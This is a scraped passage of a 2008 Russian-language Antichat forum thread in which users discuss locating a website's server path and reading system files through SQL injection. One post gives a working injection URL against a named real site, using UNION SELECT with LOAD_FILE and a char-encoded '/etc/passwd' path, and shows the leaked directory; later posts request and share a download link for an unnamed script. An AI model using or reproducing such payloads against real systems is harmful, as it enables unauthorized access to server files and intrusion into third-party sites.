ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 10.03.2008, 01:12
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216

Репутация: 150
Отправить сообщение для Sleep с помощью ICQ
По умолчанию

путь самому прописывать в форму
а полный путь до сайта на серве можно поглядеть в файле etc/passwd
еще не разу не видал чтобы чтение passwd было запрещено
 
Ответить с цитированием

  #22  
Старый 10.03.2008, 01:26
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

Цитата:
Сообщение от Sleep  
путь самому прописывать в форму
а можно в адресную строку. и нажать enter. и все

Цитата:
Сообщение от Sleep  
а полный путь до сайта на серве можно поглядеть в файле etc/passwd
может ты даже скажешь, как?)
 
Ответить с цитированием

  #23  
Старый 10.03.2008, 02:03
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216

Репутация: 150
Отправить сообщение для Sleep с помощью ICQ
По умолчанию

Цитата:
может ты даже скажешь, как?)
к тому же чаще всего при скуле полный путь до скрипта выводится в ошибке
вот пример чтения файла `/etc/passwd`
PHP код:
http://www.hardvision.ru/?dir=news&action=internet&id=-1+union+select+1,2,3,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),5,6,7,8/* 
/home/site/hardvision.ru/

Последний раз редактировалось Sleep; 10.03.2008 в 02:09..
 
Ответить с цитированием

  #24  
Старый 10.03.2008, 02:40
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

бугога сори не удиржался....
 
Ответить с цитированием

  #25  
Старый 10.03.2008, 20:44
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

Цитата:
Сообщение от [ cash ]  
бугога сори не удиржался....
+1

Sleep явно не в теме
 
Ответить с цитированием

  #26  
Старый 12.03.2008, 14:26
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

Цитата:
Сообщение от Piflit  
+1

Sleep явно не в теме

С чего бы это не в теме? на счет LOAD_FILE это он прав. Надо добавить а как человек путь определит это его уже проблема. (пути можно определить и через другие сайты хотящиеся на этом сервере.)
 
Ответить с цитированием

  #27  
Старый 12.03.2008, 21:25
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

Цитата:
Сообщение от heks  
С чего бы это не в теме? на счет LOAD_FILE это он прав. Надо добавить а как человек путь определит это его уже проблема. (пути можно определить и через другие сайты хотящиеся на этом сервере.)
load_file был добавлен в последней версии. следите за обновлениями
 
Ответить с цитированием

  #28  
Старый 28.08.2008, 00:31
NOAkill
Новичок
Регистрация: 15.03.2008
Сообщений: 5
Провел на форуме:
2994

Репутация: 0
По умолчанию

Всем респект. Хотелось бы всё-же увидеть данный скрипт. Ссылка вроде битая. Может кто в курсе, где можно слить?
 
Ответить с цитированием

  #29  
Старый 28.08.2008, 00:49
[dword]
Участник форума
Регистрация: 11.04.2007
Сообщений: 103
Провел на форуме:
1006699

Репутация: 273
Отправить сообщение для [dword] с помощью ICQ
По умолчанию

Цитата:
Сообщение от NOAkill  
Всем респект. Хотелось бы всё-же увидеть данный скрипт. Ссылка вроде битая. Может кто в курсе, где можно слить?
Ссылка не битая, но перекинул сюда http://dump.ru/file_catalog/1024852
 
Ответить с цитированием

  #30  
Старый 23.09.2008, 04:49
diehard
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме:
2590715

Репутация: 659


Отправить сообщение для diehard с помощью ICQ
По умолчанию

Можно как-нибудь перезалить сабж?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ